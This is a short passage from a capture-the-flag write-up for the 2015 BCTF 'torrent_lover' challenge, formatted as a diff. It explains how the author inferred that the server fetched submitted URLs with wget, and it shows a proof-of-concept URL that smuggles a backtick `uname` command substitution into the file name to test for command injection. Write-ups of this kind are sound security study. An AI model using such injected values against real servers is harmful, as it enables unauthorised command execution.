d4rwinb0ts/ctf-writeups/2015-bctf/torrent_lover.md

 ### Unsafe wget

 First, I submitted a url that pointed to a torrentfile on a server I controlled.
 Looking at the user-agent in the request made, it was clear that the server was using the `wget` command to fetch my torrent file.
-With this knowledge.
 If the server was in fact using wget to fetch the urls we provided, we could likely get it to execute arbitary commands.
 As a simple POC, I gave it this url:
 ```
 http://<myserver>/`uname`.torrent
 ```